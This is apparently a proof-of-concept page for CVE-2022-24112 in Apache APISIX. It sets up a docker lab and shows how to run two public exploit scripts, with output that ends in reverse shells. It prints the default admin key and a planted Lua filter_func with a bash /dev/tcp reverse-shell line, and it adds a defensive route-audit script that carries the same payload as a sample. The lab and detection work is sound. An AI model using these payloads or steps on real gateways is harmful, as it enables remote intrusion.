
POC details: c3149bb1f0010018d00de7d542c1f914e0433d97

Related vulnerability
Title: Apache APISIX security vulnerability (CVE-2022-24112)
Description: Apache APISIX is a cloud-native microservice API gateway from the Apache Software Foundation (United States). It is built on OpenResty and etcd, supports dynamic routing and hot-loading of plugins, and is suited to API management in microservice architectures. Apache APISIX contains a security vulnerability: the batch-requests plugin does not effectively restrict users' batch requests. Because the plugin re-issues the batched requests from the gateway itself, an attacker can use it to reach the Admin API as if from 127.0.0.1 and bypass its IP restriction; with the default admin key still in place this yields remote code execution, as the lab below shows. Affected products and versions: Apache APISIX before 2.10.4 and Apache APISIX before 2.12.1
Description
Apache APISIX < 2.12.1 Remote Code Execution and Docker Lab
Introduction

# Apache APISIX < 2.12.1 Remote Code Execution and Docker Lab
Clone this repository with `git clone`, then change into `apisix-docker/example`. In that directory's `docker-compose.yml` the gateway image has already been changed to `image: apache/apisix:2.12.0-alpine`, because that version is vulnerable; then bring the lab up with docker-compose.

Quick start via docker-compose; this starts all modules (APISIX, etcd and the supporting services) at once:
```bash
$ cd example
$ docker-compose -p docker-apisix up -d
```

Use `docker ps -a` to confirm the containers are running in the background. Once they are, the Admin API can be reached with a simple `curl` using the default admin key shipped in the example config (an empty route table at this point):

```bash
$ curl 'http://127.0.0.1:9080/apisix/admin/routes?api_key=edd1c9f034335f136f87ad84b625c8f1' -i
HTTP/1.1 200 OK
Date: Sun, 20 Mar 2022 15:49:17 GMT
Content-Type: application/json
Transfer-Encoding: chunked
Connection: keep-alive
Server: APISIX/2.12.0
Access-Control-Allow-Origin: *
Access-Control-Allow-Credentials: true
Access-Control-Expose-Headers: *
Access-Control-Max-Age: 3600

{"count":0,"action":"get","node":{"key":"\/apisix\/routes","nodes":{},"dir":true}}
```

- `poc.py`: the Exploit-DB 50829 script (its banner credits Ven3xy / M4xSec). Exploit usage, with the script saved as `50829.py`: `python3 50829.py http://127.0.0.1:9080/ 172.18.0.1 4444`. The arguments are the target base URL, the listener IP and the listener port.
```bash
$ python3 50829.py http://127.0.0.1:9080/ 172.18.0.1 4444

                                   .     ,                                                                          
        _.._ * __*\./ ___  _ \./._ | _ *-+-                                                                         
       (_][_)|_) |/'\     (/,/'\[_)|(_)| |                                                                          
          |                     |                                                                                   
                                                                                                                    
                (CVE-2022-24112)                                                                                    
{ Coded By: Ven3xy  | Github: https://github.com/M4xSec/ }
 
```
Reverse shell connection on the attacker's `nc` listener. The shell runs as `nobody` inside the APISIX container (source 172.19.0.8 on the compose network), in the gateway's working directory:
```bash
$ nc -lvnp 4444                       
listening on [any] 4444 ...
connect to [172.18.0.1] from (UNKNOWN) [172.19.0.8] 52334
id
uid=65534(nobody) gid=65534(nobody) groups=65534(nobody)
pwd
/usr/local/apisix
ls -la
total 52
drwxr-xr-x    1 root     root          4096 Mar 20 15:48 .
drwxr-xr-x    1 root     root          4096 Jan 28 09:06 ..
drwxr-xr-x   13 root     root          4096 Jan 28 09:07 apisix
drwx------    2 nobody   root          4096 Mar 20 15:48 client_body_temp
drwxr-xr-x    1 root     root          4096 Mar 20 15:48 conf
drwxr-xr-x    5 root     root          4096 Jan 28 09:07 deps
drwx------    2 nobody   root          4096 Mar 20 15:48 fastcgi_temp
drwxr-xr-x    2 1000     1000          4096 Mar 20 15:48 logs
drwx------    2 nobody   root          4096 Mar 20 15:48 proxy_temp
drwx------    2 nobody   root          4096 Mar 20 15:48 scgi_temp
drwx------    2 nobody   root          4096 Mar 20 15:48 uwsgi_temp
```

- `poc2.py`: a second exploit, by twseptian, that takes the target and listener as named options. Usage: `python3 poc2.py -h`
```bash
$ python3 poc2.py -h                                        

    >> Apache APISIX 2.12.1 - Remote Code Execution (RCE)
    >> by twseptian

usage: poc2.py [-h] -t TARGET_IP -p TARGET_PORT -L LOCALHOST -P LOCALPORT

Apache APISIX 2.12.1 - Remote Code Execution (RCE)

optional arguments:
  -h, --help            show this help message and exit
  -t TARGET_IP, --rhost TARGET_IP
                        Target IP
  -p TARGET_PORT, --rport TARGET_PORT
                        Target Port
  -L LOCALHOST, --lhost LOCALHOST
                        Localhost/Local IP
  -P LOCALPORT, --lport LOCALPORT
                        Localport
```

Exploit usage: `python3 poc2.py -t 127.0.0.1 -p 9080 -L 172.18.0.1 -P 4444`. As the output shows, this script starts the listener itself and drops into the shell once the gateway connects back:
```bash
$ python3 poc2.py -t 127.0.0.1 -p 9080 -L 172.18.0.1 -P 4444

    >> Apache APISIX 2.12.1 - Remote Code Execution (RCE)
    >> by twseptian

[!] Take RCE

listening on [any] 4444 ...
connect to [172.18.0.1] from (UNKNOWN) [172.19.0.8] 52372
id
uid=65534(nobody) gid=65534(nobody) groups=65534(nobody)
pwd
/usr/local/apisix
ls -la
total 52
drwxr-xr-x    1 root     root          4096 Mar 20 15:48 .
drwxr-xr-x    1 root     root          4096 Jan 28 09:06 ..
drwxr-xr-x   13 root     root          4096 Jan 28 09:07 apisix
drwx------    2 nobody   root          4096 Mar 20 15:48 client_body_temp
drwxr-xr-x    1 root     root          4096 Mar 20 15:48 conf
drwxr-xr-x    5 root     root          4096 Jan 28 09:07 deps
drwx------    2 nobody   root          4096 Mar 20 15:48 fastcgi_temp
drwxr-xr-x    2 1000     1000          4096 Mar 20 15:48 logs
drwx------    2 nobody   root          4096 Mar 20 15:48 proxy_temp
drwx------    2 nobody   root          4096 Mar 20 15:48 scgi_temp
drwx------    2 nobody   root          4096 Mar 20 15:48 uwsgi_temp
```
Listing the routes through the Admin API afterwards shows what the exploit left behind: a route with id `index` and a random-looking `uri` and `name`, whose `filter_func` is a Lua function that calls `os.execute` with a bash reverse shell to 172.18.0.1:4444 and then returns true. APISIX evaluates `filter_func` while matching a request against the route, so every request for `/rms/fzxewh` spawns a shell; delete the route once the lab is finished.
```bash
$ curl -s 'http://127.0.0.1:9080/apisix/admin/routes?api_key=edd1c9f034335f136f87ad84b625c8f1' | jq
{
  "count": 1,
  "action": "get",
  "node": {
    "key": "/apisix/routes",
    "nodes": [
      {
        "modifiedIndex": 161,
        "value": {
          "priority": 0,
          "uri": "/rms/fzxewh",
          "status": 1,
          "upstream": {
            "hash_on": "vars",
            "pass_host": "pass",
            "nodes": {
              "schmidt-schaefer.com": 1
            },
            "type": "roundrobin",
            "scheme": "http"
          },
          "id": "index",
          "create_time": 1647791428,
          "filter_func": "function(vars) os.execute('bash -c \\\"0<&160-;exec 160<>/dev/tcp/172.18.0.1/4444;/bin/sh <&160 >&160 2>&160\\\"'); return true end",
          "update_time": 1647799320,
          "name": "wthtzv"
        },
        "key": "/apisix/routes/index",
        "createdIndex": 16
      }
    ],
    "dir": true
  }
}
```
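The route dump above is also what a defender has to work with after an incident, so here is an added audit script (written for this page; it is not code from the exploit repository or from APISIX) that walks a `GET /apisix/admin/routes` response and flags every route whose inline Lua can spawn a process. It goes a little beyond the listing above by also checking the `script` field and the `serverless-pre-function` / `serverless-post-function` plugin bodies, which can carry Lua in the same way. The embedded `SAMPLE_DUMP` is constructed: the `index` route is copied from the listing, the `benign` route is made up to show a legitimate `filter_func` passing. The live-fetch path assumes the lab's Admin API address and default key; both are parameters.

```python
"""Audit APISIX routes for Lua that can execute commands.

Added example for this lab; not code from the exploit repository or APISIX.
"""
import json
import re
import sys
import urllib.request

DEFAULT_ADMIN = "http://127.0.0.1:9080"          # assumption: the docker lab above
DEFAULT_KEY = "edd1c9f034335f136f87ad84b625c8f1"   # APISIX 2.x default admin key

# Lua calls that execute a program or touch the filesystem. A request filter
# needs none of them; load/loadstring/dofile catch code that hides the real
# call inside a string. Requiring the "(" avoids matching prose or comments.
DANGEROUS_LUA = re.compile(
    r"\b(?:os\.execute|io\.popen|io\.open|os\.remove|os\.rename|"
    r"loadstring|dofile|load)\s*\("
)
# Shell fragments like those in the route above, for obfuscated Lua.
SHELL_INDICATORS = ("/dev/tcp/", "bash -c", "/bin/sh", "curl ", "wget ")


def lua_snippets(route):
    """Yield (field, lua_source) for every place a route object can carry Lua."""
    for field in ("filter_func", "script"):
        if route.get(field):
            yield field, route[field]
    plugins = route.get("plugins") or {}
    for name in ("serverless-pre-function", "serverless-post-function"):
        for idx, fn in enumerate((plugins.get(name) or {}).get("functions", [])):
            yield f"plugins.{name}.functions[{idx}]", fn


def classify(lua):
    """Return the first suspicious token found in a Lua string, or None."""
    m = DANGEROUS_LUA.search(lua)
    if m:
        return m.group(0)
    return next((s for s in SHELL_INDICATORS if s in lua), None)


def iter_routes(dump):
    """Yield (etcd key, route value) from a GET /apisix/admin/routes response.

    An empty route table is returned as "nodes": {} (first curl above) and a
    populated one as a list, so both shapes are accepted.
    """
    nodes = dump.get("node", {}).get("nodes") or []
    if isinstance(nodes, dict):
        nodes = list(nodes.values())
    for node in nodes:
        yield node.get("key", "?"), node.get("value") or {}


def audit_routes(dump):
    """Return a list of (route key, uri, field, token) for suspicious routes."""
    findings = []
    for key, route in iter_routes(dump):
        for field, lua in lua_snippets(route):
            token = classify(lua)
            if token:
                findings.append((key, route.get("uri"), field, token))
    return findings


def fetch_routes(base_url=DEFAULT_ADMIN, api_key=DEFAULT_KEY):
    """GET the route list from the Admin API, authenticating via X-API-KEY."""
    req = urllib.request.Request(
        f"{base_url.rstrip('/')}/apisix/admin/routes",
        headers={"X-API-KEY": api_key},
    )
    with urllib.request.urlopen(req, timeout=10) as resp:
        return json.load(resp)


# Constructed sample: "index" is the route from the listing above, "benign"
# is invented to show a harmless filter_func passing the check.
SAMPLE_DUMP = {
    "count": 2, "action": "get",
    "node": {"key": "/apisix/routes", "dir": True, "nodes": [
        {"key": "/apisix/routes/index", "value": {
            "id": "index", "uri": "/rms/fzxewh", "status": 1, "name": "wthtzv",
            "upstream": {"type": "roundrobin", "nodes": {"schmidt-schaefer.com": 1}},
            "filter_func": (
                r"function(vars) os.execute('bash -c \"0<&160-;"
                r"exec 160<>/dev/tcp/172.18.0.1/4444;"
                r"/bin/sh <&160 >&160 2>&160\"'); return true end"
            )}},
        {"key": "/apisix/routes/benign", "value": {
            "id": "benign", "uri": "/api/*",
            "upstream": {"type": "roundrobin", "nodes": {"web1:80": 1}},
            "filter_func": "function(vars) return vars.arg_version == '2' end"}},
    ]},
}


def main(argv):
    if len(argv) > 1:   # live mode: python3 audit.py http://host:9080 [admin_key]
        dump = fetch_routes(argv[1], argv[2] if len(argv) > 2 else DEFAULT_KEY)
    else:               # offline mode: audit the constructed sample
        dump = SAMPLE_DUMP
    findings = audit_routes(dump)
    for key, uri, field, token in findings:
        print(f"[!] {key} uri={uri}: {field} contains {token!r}")
    if not findings:
        print("no routes with process-spawning Lua found")
    return 1 if findings else 0


if __name__ == "__main__":
    sys.exit(main(sys.argv))
```

Run it without arguments to audit the embedded sample, or pass the Admin API base URL (and, if changed, the key) to audit a live gateway; it exits non-zero on findings so it can run from cron or a CI job. Matching on the Lua source rather than the route `uri` or `name` matters because, as the listing shows, the exploit randomizes both.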
## Credits
- [Apache APISIX Docker - Manual deploy apisix via docker](https://github.com/apache/apisix-docker)
- [Apache APISIX < 2.12.1 Remote Code Execution](https://kavigihan.medium.com/apache-apisix-2-12-1-remote-code-execution-5f920b22ccff)
- [Exploit-DB - Apache APISIX 2.12.1 - Remote Code Execution (RCE)](https://www.exploit-db.com/exploits/50829)
- [GitHub - Apache APISIX Remote Code Execution (CVE-2022-24112) Exploit](https://github.com/M4xSec/Apache-APISIX-CVE-2022-24112)
File snapshot

The cached repository, as listed by `tree -h`. Besides the two exploits under `poc/`, note that the bundled `example/mkcert` directory ships a CA private key (`rootCA-key.pem`); that is a lab-only artifact and must not be reused anywhere else.

```text
[4.0K] /data/pocs/c3149bb1f0010018d00de7d542c1f914e0433d97
├── [4.0K] apisix-docker
│   ├── [4.0K] all-in-one
│   │   ├── [4.0K] apisix
│   │   │   ├── [1.1K] config.yaml
│   │   │   └── [3.6K] Dockerfile
│   │   └── [4.0K] apisix-dashboard
│   │       ├── [2.1K] conf.yaml
│   │       └── [5.2K] Dockerfile
│   ├── [4.0K] alpine
│   │   ├── [2.7K] Dockerfile
│   │   ├── [4.0K] hooks
│   │   │   └── [ 942] build
│   │   └── [ 276] README.MD
│   ├── [4.0K] alpine-dev
│   │   └── [2.2K] Dockerfile
│   ├── [4.0K] alpine-local
│   │   └── [2.6K] Dockerfile
│   ├── [4.0K] centos
│   │   ├── [1.5K] Dockerfile
│   │   └── [4.0K] hooks
│   │       └── [ 942] build
│   ├── [4.0K] compose
│   │   ├── [1.5K] dashboard-compose.yaml
│   │   └── [1.6K] docker-compose.yaml
│   ├── [4.0K] dashboard
│   │   ├── [2.2K] Dockerfile.alpine
│   │   ├── [2.2K] Dockerfile.centos
│   │   └── [ 217] README.md
│   ├── [4.0K] docs
│   │   └── [4.0K] en
│   │       └── [4.0K] latest
│   │           ├── [1.4K] build.md
│   │           ├── [ 157] config.json
│   │           ├── [2.8K] example.md
│   │           └── [2.7K] manual.md
│   ├── [4.0K] example
│   │   ├── [4.0K] apisix_conf
│   │   │   └── [1.8K] config.yaml
│   │   ├── [4.0K] apisix_log
│   │   ├── [4.0K] dashboard_conf
│   │   │   └── [3.9K] conf.yaml
│   │   ├── [2.1K] docker-compose-alpine.yml
│   │   ├── [2.3K] docker-compose-arm64.yml
│   │   ├── [2.8K] docker-compose.yml
│   │   ├── [4.0K] etcd_conf
│   │   │   └── [4.2K] etcd.conf.yml
│   │   ├── [4.0K] grafana_conf
│   │   │   ├── [4.0K] config
│   │   │   │   └── [ 26K] grafana.ini
│   │   │   ├── [4.0K] dashboards
│   │   │   │   └── [ 52K] apisix-grafana-dashboard.json
│   │   │   └── [4.0K] provisioning
│   │   │       ├── [4.0K] dashboards
│   │   │       │   └── [ 958] all.yaml
│   │   │       └── [4.0K] datasources
│   │   │           └── [ 955] all.yaml
│   │   ├── [4.0K] mkcert
│   │   │   ├── [1.7K] lvh.me+1-key.pem
│   │   │   ├── [1.5K] lvh.me+1.pem
│   │   │   ├── [ 204] README.md
│   │   │   ├── [2.4K] rootCA-key.pem
│   │   │   └── [1.6K] rootCA.pem
│   │   ├── [4.0K] prometheus_conf
│   │   │   └── [1.6K] prometheus.yml
│   │   └── [4.0K] upstream
│   │       ├── [ 372] web1.conf
│   │       └── [ 372] web2.conf
│   ├── [ 11K] LICENSE
│   ├── [ 444] MAINTAINING.md
│   ├── [8.8K] Makefile
│   └── [4.0K] README.md
├── [4.0K] poc
│   ├── [4.2K] poc2.py
│   └── [2.9K] poc.py
└── [6.2K] README.md

30 directories, 45 files
```